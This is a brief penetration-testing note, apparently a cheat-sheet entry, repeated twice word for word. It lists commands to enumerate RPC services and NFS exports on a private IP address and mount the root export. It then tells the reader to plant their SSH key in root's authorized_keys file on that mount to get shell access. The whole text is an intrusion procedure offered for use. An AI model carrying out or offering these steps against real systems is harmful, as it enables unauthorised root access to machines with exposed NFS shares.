rpcinfo -p 192.168.145.133
showmount -e 192.168.145.133
mount -t nfs 192.168.145.133:/ /tmp/mount_point
You can also add your ssh key to the /root/.ssh/authorized_keys of mounted file system to get shell over ssh.
rpcinfo -p 192.168.145.133
showmount -e 192.168.145.133
mount -t nfs 192.168.145.133:/ /tmp/mount_point
You can also add your ssh key to the /root/.ssh/authorized_keys of mounted file system to get shell over ssh.